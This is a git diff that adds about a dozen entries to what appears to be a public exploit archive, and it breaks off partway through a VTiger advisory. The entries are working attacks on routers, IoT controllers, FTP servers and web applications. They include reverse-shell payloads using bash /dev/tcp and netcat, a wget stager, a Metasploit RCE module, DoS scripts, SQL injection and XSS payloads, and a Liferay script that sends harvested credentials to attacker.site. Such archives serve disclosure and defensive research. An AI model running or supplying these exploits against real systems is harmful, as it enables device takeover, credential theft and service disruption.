diff --git a/exploits/hardware/webapps/49092.txt b/exploits/hardware/webapps/49092.txt
new file mode 100644
index 000000000..fddb43849
--- /dev/null
+++ b/exploits/hardware/webapps/49092.txt
@@ -0,0 +1,28 @@
+# Exploit Title: TP-Link TL-WA855RE V5_200415 - Device Reset Auth Bypass
+# Date: 2020/07/29
+# Exploit Author: malwrforensics
+# Vendor Homepage: https://tp-link.com
+# Software link: https://static.tp-link.com/2020/202004/20200430/TL-WA855RE_V5_200415.zip
+# Version: TL-WA855RE(US)_V5_200415
+# Tested on: N/A
+# CVE : 2020-24363 
+Important: The vendor has released a fix; the new firmware (TL-WA855RE(US)_V5_200731) is available to download from: https://www.tp-link.com/us/support/download/tl-wa855re/v5/#Firmware
+
+Details
+By default the web interface of the TL-WA855RE wireless extender require users to log in in order to access the admin interface. However, an attacker, on the same network, can bypass it and use the APIs provided to reset the device to its factory settings by using the TDDP_RESET code. An attacker can then set up a new admin password, resulting in a complete takeover of the device.
+To test, you can send a POST request like the one below using the TDDP_RESET (5). The request doesn't need any type of authentication. You can then access the web interface and set a new administrative password.
+
+POST /?code=5&asyn=0 HTTP/1.1
+Host: <redacted>
+Content-Length: 7
+Accept: text/plain, */*; q=0.01
+X-Requested-With: XMLHttpRequest
+User-Agent: Mozilla/5.0
+Content-Type: text/plain;charset=UTF-8
+Origin: http://<redacted>
+Referer: http://<redacted>
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Connection: close
+
+0|1,0,0
\ No newline at end of file
diff --git a/exploits/hardware/webapps/49097.txt b/exploits/hardware/webapps/49097.txt
new file mode 100644
index 000000000..d3b719ca1
--- /dev/null
+++ b/exploits/hardware/webapps/49097.txt
@@ -0,0 +1,105 @@
+# Exploit Title: Seowon 130-SLC router 1.0.11 - 'ipAddr' RCE (Authenticated)
+# Date: 5 Aug 2020
+# Exploit Author: maj0rmil4d
+# Vendor Homepage: http://www.seowonintech.co.kr/en/
+# Hardware Link: http://www.seowonintech.co.kr/en/product/detail.asp?num=150&big_kindB05&middle_kindB05_29
+# Version: 1.0.11 (Possibly all versions)
+
+ The default user/pass is admin/admin
+ your commands run as root user
+ the vulnerablity is on the ipAddr parameter in system_log.cgi
+
+ Usage:
+
+ login to the dashboard.
+ setup your listener.
+ download the revshell.txt with the RCE
+ run the revshell.txt
+
+ * here is the RCE request :
+
+POST /cgi-bin/system_log.cgi? HTTP/1.1
+Host: 192.168.1.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/201=
+00101 Firefox/79.0
+Accept: */*
+Accept-Language: en-US,en;q0.5
+Accept-Encoding: gzip, deflate
+Content-type: application/x-www-form-urlencoded
+Content-Length: 183
+Origin: http://192.168.1.1
+Connection: close
+Referer: http://192.168.1.1/diagnostic.html?t201802140812
+Cookie: productcpe; cpe_buildTime201802140812; vendormobinnet; =
+connTypelte; modelCodeSLC_130G; cpe_multiPdnEnable1; cpe_langen=
+; cpe_voip0; cpe_cwmpc1; cpe_snmp1; filesharing0; cpe_switchEna=
+ble0; cpe_vlanEnable1; cpe_IPv6Enable1; cpe_foc0; cpe_vpn1; =
+cpe_httpsEnable0; cpe_internetMTUEnable0; cpe_sleepMode0; cpe_wlan=
+Enable1; cpe_simRestriction0; cpe_opmode1; sessionTime159664408=
+4662; cpe_loginadmin; _lang
+
+CommandDiagnostic&traceModetrace&reportIpOnly0&pingPktSize56=
+&pingTimeout30&pingCount4&ipAddr;id&maxTTLCnt30&queriesCnt3&=
+reportIpOnlyCheckboxon&btnApplyApply&T1596644096617
+
+
+* to get a reverse shell, setup the listener and download the file on the r=
+outer then run it .
+* the content of the revshell.txt :
+
+bash -i >& /dev/tcp/192.168.1.10/45214 0>&1
+
+* to download :
+
+
+POST /cgi-bin/system_log.cgi? HTTP/1.1
+Host: 192.168.1.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/201=
+00101 Firefox/79.0
+Accept: */*
+Accept-Language: en-US,en;q0.5
+Accept-Encoding: gzip, deflate
+Content-type: application/x-www-form-urlencoded
+Content-Length: 183
+Origin: http://192.168.1.1
+Connection: close
+Referer: http://192.168.1.1/diagnostic.html?t201802140812
+Cookie: productcpe; cpe_buildTime201802140812; vendormobinnet; =
+connTypelte; modelCodeSLC_130G; cpe_multiPdnEnable1; cpe_langen=
+; cpe_voip0; cpe_cwmpc1; cpe_snmp1; filesharing0; cpe_switchEna=
+ble0; cpe_vlanEnable1; cpe_IPv6Enable1; cpe_foc0; cpe_vpn1; =
+cpe_httpsEnable0; cpe_internetMTUEnable0; cpe_sleepMode0; cpe_wlan=
+Enable1; cpe_simRestriction0; cpe_opmode1; sessionTime159664408=
+4662; cpe_loginadmin; _lang
+
+CommandDiagnostic&traceModetrace&reportIpOnly0&pingPktSize56=
+&pingTimeout30&pingCount4&ipAddr;wget http://192.168.1.10/revshell=
+.txt&maxTTLCnt30&queriesCnt3&reportIpOnlyCheckboxon&btnApplyApp=
+ly&T1596644096617
+
+
+* to run it :
+
+POST /cgi-bin/system_log.cgi? HTTP/1.1
+Host: 192.168.1.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/201=
+00101 Firefox/79.0
+Accept: */*
+Accept-Language: en-US,en;q0.5
+Accept-Encoding: gzip, deflate
+Content-type: application/x-www-form-urlencoded
+Content-Length: 183
+Origin: http://192.168.1.1
+Connection: close
+Referer: http://192.168.1.1/diagnostic.html?t201802140812
+Cookie: productcpe; cpe_buildTime201802140812; vendormobinnet; =
+connTypelte; modelCodeSLC_130G; cpe_multiPdnEnable1; cpe_langen=
+; cpe_voip0; cpe_cwmpc1; cpe_snmp1; filesharing0; cpe_switchEna=
+ble0; cpe_vlanEnable1; cpe_IPv6Enable1; cpe_foc0; cpe_vpn1; =
+cpe_httpsEnable0; cpe_internetMTUEnable0; cpe_sleepMode0; cpe_wlan=
+Enable1; cpe_simRestriction0; cpe_opmode1; sessionTime159664408=
+4662; cpe_loginadmin; _lang
+
+CommandDiagnostic&traceModetrace&reportIpOnly0&pingPktSize56=
+&pingTimeout30&pingCount4&ipAddr;bash revshell.txt&maxTTLCnt30&=
+queriesCnt3&reportIpOnlyCheckboxon&btnApplyApply&T1596644096617
\ No newline at end of file
diff --git a/exploits/hardware/webapps/49110.py b/exploits/hardware/webapps/49110.py
new file mode 100755
index 000000000..25e34aa56
--- /dev/null
+++ b/exploits/hardware/webapps/49110.py
@@ -0,0 +1,101 @@
+# Product: Ruckus IoT Controller (Ruckus vRIoT)
+# Version: <= 1.5.1.0.21
+# Vendor: https://support.ruckuswireless.com/
+# Vulnerability: Command Injection & Broken Authentication
+# References: CVE-2020-26878
+# Discovered by: Juan Manuel Fernandez
+# Exploit Title: Ruckus IoT Controller (Ruckus vRIoT) 1.5.1.0.21 - Remote Code Execution
+# Exploit Author: Emre SUREN
+# Disclosure Date: 2020-10-26
+# Tested on: Appliance
+
+#!/usr/bin/python
+# -*- coding: utf-8 -*-
+
+import requests, urllib3, sys
+from Crypto.Cipher import AES
+from base64 import b64encode, b64decode
+from colorama import Fore
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+def listen(lhost, lport):
+	opt = str(raw_input(Fore.YELLOW + "[?] Listening " + lhost + " " + lport + " (i.e. netcat) ? (y/n): "))
+	if opt == "y":
+		return True
+	else:
+		return False
+
+def generatePayload(lhost, lport):
+
+	payload="; rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|/bin/sh -i 2>&1|nc "+lhost+" "+lport+" >/tmp/f; #"
+
+	return payload
+
+def generateMagicToken():
+
+	enc_dec_method = 'utf-8'
+	salt = 'nplusServiceAuth'
+	salt = salt.encode("utf8")
+	str_key = 'serviceN1authent'
+	str_to_enc = 'TlBMVVMx'
+
+	return encrypt(enc_dec_method, salt, str_key, str_to_enc)
+
+def encrypt(enc_dec_method, salt, str_key, str_to_enc):
+
+	aes_obj = AES.new(str_key, AES.MODE_CFB, salt)
+	hx_enc = aes_obj.encrypt(str_to_enc.encode("utf8"))
+	mret = b64encode(hx_enc).decode(enc_dec_method)
+
+	return mret
+
+def execCmd(rhost, rport, lhost, lport):
+
+	payload = generatePayload(lhost, lport)
+	post_data = {
+	   "username": payload,
+	   "password": "test"
+	}
+	print(Fore.BLUE + "[*] Payload\t: " + payload)
+
+	token = generateMagicToken()
+	headers = {
+		"Authorization": token
+	}
+
+	rpath = "/service/v1/createUser"
+	uri = 'https://' + rhost + ":" + rport + rpath
+
+	r = requests.post(uri, json=post_data, headers=headers, verify=False)
+	print(Fore.BLUE + "[*] Request sent")
+
+	if r.status_code == 200:    
+		print(Fore.GREEN + "[+] Successful. Check for the session...")
+	else:
+		print(Fore.RED + "[X] Failed. Check for the response...")
+		print(Fore.BLUE + "[*] Response\t: " + r.text)
+		sys.exit()
+
+def main():
+
+	if (len(sys.argv) != 5):
+		print("[*] Usage: ruckus151021.py <RHOST> <RPORT> <LHOST> <LPORT>")
+		print("[*] <RHOST> -> Target IP")
+		print("[*] <RPORT> -> Target Port")
+		print("[*] <LHOST> -> Attacker IP")
+		print("[*] <LPORT> -> Attacker Port")
+		print("[*] Example: python {} 192.168.2.25 443 192.168.2.3 9001".format(sys.argv[0]))
+		exit(0)
+
+	rhost = sys.argv[1]
+	rport = sys.argv[2]
+	lhost = sys.argv[3]
+	lport = sys.argv[4]
+
+	if not listen(lhost, lport):
+		print(Fore.RED + "[!] Please listen at port {} to connect a reverse session !".format(lport))
+	else:
+		execCmd(rhost, rport, lhost, lport)
+
+if __name__ == "__main__":
+    main()
\ No newline at end of file
diff --git a/exploits/linux/dos/49119.py b/exploits/linux/dos/49119.py
new file mode 100755
index 000000000..fc814a710
--- /dev/null
+++ b/exploits/linux/dos/49119.py
@@ -0,0 +1,18 @@
+# Exploit Title: libupnp 1.6.18 - Stack-based buffer overflow (DoS)
+# Date: 2020-08-20
+# Exploit Author: Patrik Lantz
+# Vendor Homepage: https://pupnp.sourceforge.io/
+# Software Link: https://sourceforge.net/projects/pupnp/files/pupnp/libUPnP%201.6.6/libupnp-1.6.6.tar.bz2/download
+# Version: <= 1.6.6
+# Tested on: Linux
+# CVE : CVE-2012-5958
+
+import socket
+
+payload = "M-SEARCH * HTTP/1.1\r\nHOST: 239.255.255.250:1900\r\nST:uuid:schemas:device:"
+payload += "A"*324 + "BBBB"
+payload += ":urn:\r\nMX:2\r\nMAN:\"ssdp:discover\"\r\n\r\n"
+
+byte_message = bytes(payload)
+s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+s.sendto(byte_message, ("239.255.255.250", 1900))
\ No newline at end of file
diff --git a/exploits/linux/webapps/49096.rb b/exploits/linux/webapps/49096.rb
new file mode 100755
index 000000000..3dbb76d8b
--- /dev/null
+++ b/exploits/linux/webapps/49096.rb
@@ -0,0 +1,94 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Zeroshell 3.9.0 Remote Command Execution',
+      'Description'    => %q{
+        This module exploits an unauthenticated command injection vulnerability 
+        found in ZeroShell 3.9.0 in the "/cgi-bin/kerbynet" url. 
+        As sudo is configured to execute /bin/tar without a password (NOPASSWD)
+        it is possible to run root commands using the "checkpoint" tar options.
+      },
+      'Author'         => [
+        'Juan Manuel Fernandez', # Vulnerability discovery
+        'Giuseppe Fuggiano <giuseppe[dot]fuggiano[at]gmail.com>', # Metasploit module
+      ],
+      'References'     => [
+        ['CVE', '2019-12725'],
+        ['URL', 'https://www.tarlogic.com/advisories/zeroshell-rce-root.txt'],
+        ['URL', 'https://github.com/X-C3LL/PoC-CVEs/blob/master/CVE-2019-12725/ZeroShell-RCE-EoP.py']
+      ],
+      'DisclosureDate' => 'Jul 17 2019',
+      'License'        => MSF_LICENSE,
+      'Privileged'     => true, 
+      'Platform'       => [ 'unix', 'linux' ],
+      'Arch'           => [ ARCH_X86 ],
+      'Targets'        => [
+       ['Zeroshell 3.9.0 (x86)', {
+         'Platform'    => 'linux',
+         'Arch'        => ARCH_X86,
+        }],
+      ],
+      'DefaultTarget'  => 0,
+    ))
+
+    register_options(
+      [
+        Opt::RPORT(443),
+        OptBool.new('SSL', [true, 'Use SSL', true]),
+      ])
+  end
+
+  def execute_command(cmd, opts = {})
+    command_payload  = "%27%0A%2Fetc%2Fsudo+tar+-cf+%2Fdev%2Fnull+%2Fdev%2Fnull+--checkpoint%3d1+--checkpoint-action%3dexec%3d%22#{filter_bad_chars(cmd)}%22%0A%27"
+
+    print_status("Sending stager payload...")
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri'    => '/cgi-bin/kerbynet',
+      'encode_params' => false,
+      'vars_get' => {
+        'Action' => 'x509view',
+        'Section' => 'NoAuthREQ',
+        'User' => '',
+        'x509type' => command_payload
+      }
+    )
+
+    return res
+  end
+
+  def filter_bad_chars(cmd)
+    cmd.gsub!(/chmod \+x/, 'chmod 777')
+    cmd.gsub!(/;/, " %0A ")
+    cmd.gsub!(/ /, '+')
+    cmd.gsub!(/\//, '%2F')
+    return cmd
+  end
+
+  def check
+    res = execute_command('id')
+    if res && res.body.include?("uid=0(root)")
+      Exploit::CheckCode::Appears
+    else
+      Exploit::CheckCode::Safe
+    end
+  end
+
+  def exploit
+    print_status("Exploiting...")
+    execute_cmdstager(flavor: :wget, delay: 5)
+  end
+
+end
\ No newline at end of file
diff --git a/exploits/multiple/dos/49105.py b/exploits/multiple/dos/49105.py
new file mode 100755
index 000000000..d9dd0c2a2
--- /dev/null
+++ b/exploits/multiple/dos/49105.py
@@ -0,0 +1,99 @@
+# Exploit Title: Pure-FTPd 1.0.48 - Remote Denial of Service
+# Date: 2020. nov. 26., 09:32:17 CET
+# Exploit Author: xynmaps
+# Vendor Homepage: https://www.pureftpd.org/project/pure-ftpd/
+# Software Link: https://github.com/jedisct1/pure-ftpd/
+# Version: 1.0.48
+# Tested on: Parrot Security OS 5.9.0
+
+#encoding=utf8
+#__author__ = XYN/Dump/NSKB3
+#Pure-FTPd Denial of Service exploit by XYN/Dump/NSKB3.
+"""
+Pure-FTPd only lets a certain amount of connections to be made to the server, so, by repeatedly making new connections to the server,
+you can block other legitimite users from making a connection to the server, if the the connections/ip isn't limited.
+(if it's limited, just run this script from different proxies using proxychains, and it will work)
+"""
+
+import socket
+import sys
+import threading
+import subprocess
+import time
+
+banner = """
+._________________.
+|    Pure-FTPd    |
+|      D o S      |
+|_________________|
+|By XYN/DUMP/NSKB3|
+|_|_____________|_|
+|_|_|_|_____|_|_|_|
+|_|_|_|_|_|_|_|_|_|
+
+"""
+usage = "{} <TARGET> <PORT(DEFAULT:21> <MAX_CONNS(DEFAULT:50)>".format(sys.argv[0])
+
+def test(t,p):
+	s = socket.socket()
+	s.settimeout(10)
+	try:
+		s.connect((t, p))
+		response = s.recv(65535)
+		s.close()
+		return 0
+	except socket.error:
+		print("Port {} is not open, please specify a port that is open.".format(p))
+		sys.exit()
+def attack(targ, po, id):
+	try:
+		subprocess.Popen("ftp {0} {1}".format(targ, po), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
+		#print("Worker {} running".format(id))
+	except OSError: pass
+def main():
+	global target, port, start
+	print banner
+	try:
+		target = sys.argv[1]
+	except:
+		print usage
+		sys.exit()
+	try:
+		port = int(sys.argv[2])
+	except:
+		port = 21
+	try:
+		conns = int(sys.argv[3])
+	except:
+		conns = 50
+	print("[!] Testing if {0}:{1} is open".format(target, port))
+	test(target, port)
+	print("[+] Port {} open, starting attack...".format(port))
+	time.sleep(2)
+	print("[+] Attack started on {0}:{1}!".format(target, port))
+	def loop(target, port, conns):
+		global start
+		threading.Thread(target=timer).start()
+		while 1:
+			for i in range(1, conns + 3):
+				t = threading.Thread(target=attack, args=(target,port,i,))
+				t.start()
+				if i > conns + 2:
+					t.join()
+					break
+					loop()
+
+	t = threading.Thread(target=loop, args=(target, port, conns,))
+	t.start()
+
+def timer():
+        start = time.time()
+        while 1:
+                if start < time.time() + float(900): pass
+                else:
+                        subprocess.Popen("pkill ftp", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
+                        t = threading.Thread(target=loop, args=(target, port,))
+			t.start()
+                        break
+
+main()
\ No newline at end of file
diff --git a/exploits/multiple/local/49108.txt b/exploits/multiple/local/49108.txt
new file mode 100644
index 000000000..aa42c62d4
--- /dev/null
+++ b/exploits/multiple/local/49108.txt
@@ -0,0 +1,26 @@
+# Exploit Title: SAP Lumira 1.31 - Stored Cross-Site Scripting
+# Date: 13.08.2020
+# Exploit Author: Ilca Lucian Florin
+# Vendor Homepage: https://www.sap.com
+# Software Link: SAP Lumira
+# Version: <= 1.31
+# Tested on: Windows 7 / Windows 10 / Internet Explorer 11 / Google Chrome 84.0.4147.105
+
+# Vulnerable System: https://system/BOE/BI
+
+# Reproduce Cross Site Scripting (XSS):
+
+1. Select Web Intelligence Button
+2. Wait for SAP Business Objects to load complete
+3. CTRL +N or click on New Document
+4. Create an empty document
+5. Select new variable
+6. Select random name for the variable
+7. Add the XSS vectors from evidence
+8. Open variable tab and click on new created variable name
+
+# Cross Site Scripting (XSS) Vectors Used:
+
+• "><h1><IFRAME SRC=#
+onmouseover="alert(document.cookie)"></IFRAME>123</h1>
+• <IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">
\ No newline at end of file
diff --git a/exploits/multiple/webapps/48855.txt b/exploits/multiple/webapps/48855.txt
deleted file mode 100644
index fbcd18c0d..000000000
--- a/exploits/multiple/webapps/48855.txt
+++ /dev/null
@@ -1,34 +0,0 @@
-# Exploit Title: MOVEit Transfer 11.1.1 - 'token' Unauthenticated SQL Injection 
-# Google Dork: inurl:human.aspx intext:moveit
-# Date: 2020-10-05
-# Exploit Author: Aviv Beniash
-# Vendor Homepage: https://www.ipswitch.com/
-# Version: MOVEit Transfer 2018 SP2 before 10.2.4, 2019 before 11.0.2, and 2019.1 before 11.1.1
-# CVE : CVE-2019-16383
-# 
-# Related Resources:
-# https://community.ipswitch.com/s/article/SQL-Injection-Vulnerability
-# https://nvd.nist.gov/vuln/detail/CVE-2019-16383
-
-# Description:
-# The API call for revoking logon tokens is vulnerable to a
-# Time based blind SQL injection via the 'token' parameter
-
-# MSSQL payload:
-
-POST /api/v1/token/revoke HTTP/1.1
-Host: moveittransferstg
-Content-Type: application/x-www-form-urlencoded
-Content-Length: 32
-
-token='; WAITFOR DELAY '0:0:10'--
-
-
-# MySQL payload:
-
-POST /api/v1/token/revoke HTTP/1.1
-Host: moveittransferstg
-Content-Type: application/x-www-form-urlencoded
-Content-Length: 21
-
-token=' OR SLEEP(10);
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49091.txt b/exploits/multiple/webapps/49091.txt
new file mode 100644
index 000000000..f8867cee8
--- /dev/null
+++ b/exploits/multiple/webapps/49091.txt
@@ -0,0 +1,31 @@
+# Exploit Title: LifeRay 7.2.1 GA2 - Stored XSS
+# Date: 10/05/2020 
+# Exploit Author: 3ndG4me
+# Vendor Homepage: https://www.liferay.com/
+# Software Link: https://www.liferay.com/
+# Version: 7.1.0 -> 7.2.1 GA2 (REQUIRED)
+# Tested on: Debian Linux
+# CVE : CVE-2020-7934
+# Public Exploit/Whitepaper: https://github.com/3ndG4me/liferay-xss-7.2.1GA2-poc-report-CVE-2020-7934
+
+# NOTE: The attached proof of concept is a javascript payload,
+submitted as a ".txt" file to attach via email as ".js" is often
+blocked.
+
+// CVE-2020-7934 Cred Phishing Example Attack
+// Author: 3ndG4me
+// Github: https://github.com/3ndG4me/liferay-xss-7.2.1GA2-poc-report-CVE-2020-7934
+
+// Host this payload with your site and paste in this script tag into a vulnerable field with your URL replaced where relevant:
+// <SCRIPT SRC="//attacker.site/cve-2020-7934.js">
+
+var email = prompt("To process this search we need you to confirm your credentials.\n\nPlease confirm your email:", "");
+var password = prompt("To process this search we need you to confirm your credentials.\n\nPlease confirm your password:", "");
+
+
+console.log(email);
+console.log(password);
+
+var url = "http://attacker.site/" + email + ":" + password;
+
+$.get(url);
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49093.txt b/exploits/multiple/webapps/49093.txt
new file mode 100644
index 000000000..5703b5153
--- /dev/null
+++ b/exploits/multiple/webapps/49093.txt
@@ -0,0 +1,42 @@
+# Exploit Title: nopCommerce Store 4.30 - 'name' Stored Cross-Site Scripting
+# Date: 24-11-2020
+# Exploit Author: Hemant Patidar (HemantSolo)
+# Vendor Homepage: https://www.nopcommerce.com/
+# Version: 4.30
+# Tested on: Windows 10/Kali Linux
+
+Stored Cross-site scripting(XSS):
+Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application.
+
+Attack vector:
+This vulnerability can results attacker to inject the XSS payload in Schedule tasks and each time any user will go to that page of the website, the XSS triggers and attacker can able to steal the cookie according to the crafted payload.
+
+Vulnerable Parameters: Schedule tasks.
+
+Steps-To-Reproduce:
+1. Go to the nopCommerce Store admin page.
+2. Now go to the System-Schedule tasks option.
+3. Now click to on edit button on any task.
+4. Put the below payload in Schedule tasks: "hemantsolo"><img src=x onerror=confirm(1)>"
+5. Now click on Update button.
+6. The XSS will be triggered.
+
+POST /Admin/ScheduleTask/TaskUpdate HTTP/1.1
+Host: 127.0.0.1
+Connection: close
+Content-Length: 335
+Accept: application/json, text/javascript, */*; q=0.01
+DNT: 1
+X-Requested-With: XMLHttpRequest
+User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Origin: 127.0.0.1
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Sec-Fetch-Dest: empty
+Referer: 127.0.0.1/Admin/ScheduleTask/List
+Accept-Encoding: gzip, deflate
+Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,hi;q=0.7,ru;q=0.6
+Cookie: xyz
+
+Id=5&Name=hemantsolo%22%3E%3Cimg+src%3Dx+onerror%3Dconfirm(1)%3E&Seconds=3600&Enabled=false&StopOnError=false&__RequestVerificationToken=CfDJ8Hstb5ORl7RLtnBnyhE10fENmFHuOPhDq-cN_XNT5gs_nUq2ht5UeggYY9Fea9OqSCeJnVy_e4IKpQ7HhLYwtOMRS76BYcfJ9Os-CI9BxTxrumbAaunwIxrDMZm6CbNRs9EPzKQabez4H7dNpXG6oVpiC5Pc__xQVm06bp4c4O_D15lqehkk6EmqDAizfm8LFA
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49094.txt b/exploits/multiple/webapps/49094.txt
new file mode 100644
index 000000000..d27e40d9f
--- /dev/null
+++ b/exploits/multiple/webapps/49094.txt
@@ -0,0 +1,20 @@
+# Exploit Title: Apache OpenMeetings 5.0.0 - 'hostname' Denial of Service
+# Google Dork: "Apache OpenMeetings DOS"
+# Date: 2020-08-28
+# Exploit Author: SunCSR (ThienNV - Sun* Cyber Security Research)
+# Vendor Homepage: https://openmeetings.apache.org/
+# Software Link: https://openmeetings.apache.org/
+# Version: 4.0.0 - 5.0.0
+# Tested on: Windows
+# CVE: CVE-2020-13951
+
+- POC:
+# Vulnerability variable: hostname
+# Payload: x.x.x.x;ls
+# Request exploit:
+
+GET /openmeetings/wicket/bookmarkable/org.apache.openmeetings.web.pages.HashPage?3-1.0-panel~main&app=network&navigatorAppName=Netscape&navigatorAppVersion=5.0 (Windows)&navigatorAppCodeName=Mozilla&navigatorCookieEnabled=true&navigatorJavaEnabled=false&navigatorLanguage=en-US&navigatorPlatform=Win32&navigatorUserAgent=Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0&screenWidth=1920&screenHeight=1080&screenColorDepth=24&jsTimeZone=Asia/Ho_Chi_Minh&utcOffset=7&utcDSTOffset=7&browserWidth=1920&browserHeight=966&hostname=x.x.x.x;ls&codebase=https://x.x.x.x:5443/openmeetings/hash&settings=[object Object]&_=1597801817026
+
+- Reference: 
+https://lists.apache.org/thread.html/re2aed827cd24ae73cbc320e5808020c8d12c7b687ee861b27d728bbc%40%3Cuser.openmeetings.apache.org%3E
+https://nvd.nist.gov/vuln/detail/CVE-2020-13951
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49113.py b/exploits/multiple/webapps/49113.py
new file mode 100755
index 000000000..51f193f44
--- /dev/null
+++ b/exploits/multiple/webapps/49113.py
@@ -0,0 +1,87 @@
+# Exploit Title: Acronis Cyber Backup 12.5 Build 16341 - Unauthenticated SSRF
+# Date: 2020-07-30
+# Author: Julien Ahrens
+# Vendor Homepage: https://www.acronis.com
+# Version: 12.5 Build 16341
+# CVE: CVE-2020-16171
+
+VERSIONS AFFECTED
+====================
+Acronis Cyber Backup v12.5 Build 16327 and probably below.
+
+VULNERABILITY DETAILS
+========================
+All API endpoints running on port 9877 under "/api/ams/" whereof some are
+reachable without authentication, do accept an additional custom header called
+"Shard":
+
+def get_ams_address(headers):
+    if 'Shard' in headers:
+        [...]
+        return headers.get('Shard')  # Mobile agent >= ABC5.0
+
+The value of this header is afterwards to construct a separate web request send
+by the application using a urllib.request.urlopen call:
+
+def make_request_to_ams(resource, method, data=None):
+    port = config.CONFIG.get('default_ams_port', '9892')
+    uri = 'http://{}:{}{}'.format(get_ams_address(request.headers), port, resource)
+    logging.debug('Making request to AMS %s %s', method, uri)
+    headers = dict(request.headers)
+    del headers['Content-Length']
+    if not data is None:
+        headers['Content-Type'] = 'application/json'
+    req = urllib.request.Request(uri,
+                                 headers=headers,
+                                 method=method,
+                                 data=data)
+    resp = None
+    try:
+        resp = urllib.request.urlopen(req, timeout=wcs.web.session.DEFAULT_REQUEST_TIMEOUT)
+    except Exception as e:
+        logging.error('Cannot access ams {} {}, error: {}'.format(method, resource, e))
+    return resp
+
+This can be abused to conduct SSRF attacks against otherwise unreachable internal hosts
+of Acronis services that are bound to localhost such as the "NotificationService" running
+on 127.0.0.1:30572 with a request header like:
+
+Shard: localhost:30572/external_email?
+
+For more details, see the referenced blog post.
+
+RISK
+=======
+The vulnerability can be used by an unauthenticated or authenticated attacker
+to query otherwise unreachable internal network resources. As demonstrated in
+the corresponding blog post, using this vulnerability, it is possible to i.e.
+(amongst others) send out fully customized emails or modify the application's
+resource settings.
+
+
+7. SOLUTION
+===========
+Update to v12.5 Build 16342 
+
+
+8. REPORT TIMELINE
+==================
+2020-07-30: Discovery of the vulnerability
+2020-07-30: Since the vulnerability is fixed in Cyber Protect: Sent out a
+            request to the Vendor to check whether Cyber Backup is EOL and users
+            are advised to migrate to Cyber Protect instead.
+2020-07-30: CVE requested from MITRE
+2020-07-31: MITRE assigns CVE-2020-16171
+2020-07-31: Public Disclosure date set to 2020-08-14
+2020-08-04: Vendor asks for a 90 days extension
+2020-08-04: Extension not granted because there is a fix available already. Public disclosure 
+            date set to 2020-09-14
+2020-09-05: Asking vendor about the status of the fix
+2020-09-08: Vendor states that a fix has been backported to Cyber Backup 12.5 under the 
+            reference ABR-202103
+2020-09-14: Public disclosure
+
+9. REFERENCES
+=============
+https://www.rcesecurity.com/2020/09/CVE-2020-16171-Exploiting-Acronis-Cyber-Backup-for-Fun-and-Emails/
+https://dl.acronis.com/u/backup/rn/12.5/user/en-US/AcronisBackup12.5_relnotes.htm
\ No newline at end of file
diff --git a/exploits/php/webapps/49090.txt b/exploits/php/webapps/49090.txt
new file mode 100644
index 000000000..59636567d
--- /dev/null
+++ b/exploits/php/webapps/49090.txt
@@ -0,0 +1,282 @@
+# Exploit Title: VTiger v7.0 CRM - 'To' Persistent XSS
+# Date: 2020-11-18
+# Exploit Vulnerability-Lab
+# Vendor Homepage: https://www.vtiger.com/open-source-crm/download-open-source/
+# Software Link: https://sourceforge.net/projects/vtigercrm/files/
+# Version: v7.0
+
+Document Title:
+===============
+VTiger v7.0 CRM - (To) Persistent Email Vulnerability
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2227
+
+
+Release Date:
+=============
+2020-11-18
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+2227
+
+
+Common Vulnerability Scoring System:
+====================================
+4.8
+
+
+Vulnerability Class:
+====================
+Cross Site Scripting - Persistent
+
+
+Current Estimated Price:
+========================
+1.000€ - 2.000€
+
+
+Product & Service Introduction:
+===============================
+Vtiger CRM is web-application built using PHP. Choose the best CRM for
+your business. Custom Module & Relationship builder for
+VTiger is a very useful extension that allows crm administrators to
+create custom modules within few clicks. All custom modules
+are created following strict VTiger standards. In addition, the
+relationship builder allows crm admin to link together existing modules
+as well as new custom modules.
+
+(Copy of the Homepage:
+https://www.vtiger.com/open-source-crm/download-open-source/ )
+
+
+Abstract Advisory Information:
+==============================
+The vulnerability laboratory core research team discovered a persistent
+cross site vulnerability in the VTiger v7.0 CRM open-source web-application.
+
+
+Affected Product(s):
+====================
+VTExperts
+Product: VTiger v7.0 - CRM (Web-Application)
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2020-04-27: Public Disclosure (Vulnerability Laboratory)
+2020-04-28: Researcher Notification & Coordination (Security Researcher)
+2020-04-29: Vendor Notification 1 (Security Department)
+2020-05-30: Vendor Notification 2 (Security Department)
+2020-06-22: Vendor Notification 3 (Security Department)
+****-**-**: Vendor Response/Feedback (Security Department)
+****-**-**: Vendor Fix/Patch (Service Developer Team)
+****-**-**: Security Acknowledgements (Security Department)
+2020-11-18: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
